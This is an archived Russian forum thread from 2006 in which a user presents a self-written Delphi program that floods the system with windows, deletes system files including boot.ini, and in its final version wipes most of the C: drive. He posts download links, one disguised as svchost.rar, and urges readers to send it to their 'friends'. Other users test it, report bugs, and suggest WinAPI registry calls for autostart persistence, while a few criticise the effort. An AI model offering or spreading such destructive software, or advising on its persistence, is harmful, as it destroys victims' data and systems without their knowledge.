PDA

Просмотр полной версии : Мой вир Apalone!!!

Dmitriy507
26.08.2006, 18:22
Наконец то я написал свой первый вирус!
Вир написан в среде Делфи 7.
Он открывает кучу приложений около 2000))))
Чем очень блокирует работу компа! Процессор грузится на 100%!
Забивается RAM! В общем, все ресурсы используются по максимуму!
К тому же он удаляет системные файлы, в том числе и виртуальную память(наверное)!
Так как я еще не разобрался с автозагрузкой, система больше не загрузится!
Как я говорил. Вирус удаляет много системных файлов, среди них boot.ini!
Ешо поверх всех этих операций высвечивается окошечко с названием вира, его автором, версией, а так же полоской состояния!
В общем, все красиво!
Желаю приятного использования!

Отсылайте этот вирус своим «Друзьям», знакомым!
Когда вир запалят дайте плиз линк, где можно прочитать про него! Интересно…

Если вирус не работает, или у вас есть дополнение, пишите сюда!

Спасибо за внимание!
Я очень старался! ;)

ссылка на закачку:
http://kompna100.by.ru/svchost.rar

ps
если не в тему извеняйте. это же на делфи писанно...

Ch3ck
26.08.2006, 19:05
Молодец. Начинающий вирмэйкер :cool:

freddi
26.08.2006, 19:24
во-первых: нет никакого окошечка с названием вира, его автором, версией, а так же полоской состояния;

во-вторых: винда по прежнему грузится, но когда нужно выбрать операционку она говорит "неправельный boot.ini"

ну а ваще молодец, хоть как-то он работает :)

[hidden]
27.08.2006, 00:37
Вирус - программа, основной функцией которой является самораспространение, возможны также и деструктивные функции. То есть вирус заражает другие программы, копируя в них свой код и перехватывая управление программой при ее запуске для дальнейшего распространения. Хинт: все последние эпидемии идут от червей, а не от вирусов, вирусы в чистом понимании этого слова отошли в прошлое.

Логическая бомба - деструктивная программа, срабатывающая при определенных условиях.

-----
Разберись с терминологией ;)

+toxa+
27.08.2006, 00:58
2 Dmitriy507
Пиаришься))

Ешо поверх всех этих операций высвечивается окошечко с названием вира, его автором, версией, а так же полоской состояния!

Dmitriy507
27.08.2006, 06:46
я на делфи написал глав окошко, выводить поверх всех окон,
но наверное из за большого колличества окон его захлестнуло, попробую исправить....

2[hidden] значит у меня не вирус а логическая бомба?

Sn@k3
27.08.2006, 13:06
"неправельный boot.ini"

[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOW S [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional RU" /fastdetect /kernel=kernel1.exe
вот рабочий =).
юлин я стока виров раньше писал хех всё под снос ушло хз. винда ушла, когда тестил один из них. :(.

Dmitriy507
27.08.2006, 13:17
а я вот вторую версию пишу!
ща тестил, винда напрочь слетела!
хорошо я заранее слепок сделал!))))
я всетаки его вирусом звать буду....
не карасивоИМХО как то логическая бомба...

BUG(O)R
27.08.2006, 13:40
Да уж... помницо ещё в школе в классе 10ом наверное, создал свой первый деструктивный код, он тоже забивал всю память, сворачивал каждую секунду все окна и прописывался в авторан, так гордился этим, кодил я наверное тогда от силы неделю, буквально пару первых глав в учебнике прочёл...
Спустя время начинаешь понимать, что подобные программы ровным счётом ничего не стоят, их может написать любой человек, который прочёл первые 50-70 страниц учебника по программированию.
Автор, на будущее, не старайся разрушать, для этого ни много ума ни много знаний не надо и ни у кого ты этим уважения не вызовешь, создавай что-нибудь полезное для себя или для других. Со временем, если продвинешься в теме кодинга или вообще в теме, то поймёшь как было глупо создавать подобные "вирусы".
Это конечно личное дело каждого, все мы этот этап проходили, но лучше перескочи через него, никакой пользы от этого нет ;)

Dmitriy507
27.08.2006, 16:30
ты меня маленько отговорил...
но всетаки я выпустиол посленюю версию этого вира, финальная....
работает все!
только тер все практически с диска с уаляется....
ущерб ощенимый!
пользуйтесь!!!

ссылка на закачку:
http://kompna100.by.ru/apalone.rar

я сторался, всем спасибо!

freddi
27.08.2006, 16:55
вот щас все нормально.

но:

1. загружаются только окна, раньше были и проги.
2. окошко с названием не появляется.
3. в начале секунд 5 ничего не происходет, я уж подумал что не работыер, но потом все хорошо.

tRu
27.08.2006, 17:20
Гы...
насчёт автозагрузки, есть две замечательные функции winapi: RegOpenKey, RegSetValueEx.
Почитай про них.

Ch3ck
27.08.2006, 19:22
У меня такой вопрос... а РАЗВЕ виндоус даст удалить boot.ini ??!!??!!??

Dmitriy507
27.08.2006, 19:26
даст!
первые 5 сек вир удаляет с диска с файлы....

sn0w
29.08.2006, 21:50
парни возьмите в руки учебники по асму и доки по ядерному кодингу, вот тогда будет на что посмотреть, а то посмотрите как я написал MessageBox(0, "Hello world!:\",0,0) скорее оффтоп чем тема для разговора.

Dmitriy507
29.08.2006, 23:52
эт ты про что?

tclover
29.08.2006, 23:58
Он намекает на то что твоя программа дерьмо.

Dmitriy507
30.08.2006, 08:21
я знаю...